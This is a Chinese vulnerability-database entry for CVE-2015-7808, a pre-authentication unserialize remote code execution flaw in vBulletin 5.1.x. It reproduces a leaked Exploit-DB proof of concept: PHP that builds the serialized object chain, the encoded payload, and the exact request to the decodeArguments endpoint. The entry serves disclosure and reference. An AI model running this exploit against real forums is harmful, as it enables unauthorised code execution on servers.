vBulletin 任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123090 漏洞类型 输入验证
发布时间 2015-11-05 更新时间 2020-08-24
CVE编号 CVE-2015-7808 CNNVD-ID CNNVD-201511-131
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/38629
https://cxsecurity.com/issue/WLB-2015110108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201511-131
|漏洞详情
vBulletin是美国Internet Brands和vBulletin Solutions公司共同开发的一款开源的商业Web论坛程序。 vBulletin 5.1.4版本至5.1.9版本的decodeArguments方法中的‘unserialize’函数存在安全漏洞,该漏洞源于程序中的API没有验证Ajax请求的来源。未经身份验证的远程攻击者可通过在‘$args’变量中注入特制的对象利用该漏洞调用vB_Api类中的任意public方法,在服务器上执行任意php代码。
|漏洞EXP
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE : 
# I did not discover this exploit, leaked from the IoT.

# Build the object
php << 'eof'
<?php
class vB_Database {
       public $functions = array();

       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}

print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

#Then hit decodeArguments with your payload :
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
|参考资料

来源:packetstormsecurity.com
链接:http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html
来源:blog.checkpoint.com
链接:http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/
来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/38629/
来源:www.rapid7.com
链接:http://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserialize
来源:pastie.org
链接:http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq
来源:blog.sucuri.net
链接:https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html
来源:NSFOCUS
名称:31510
链接:http://www.nsfocus.net/vulndb/31510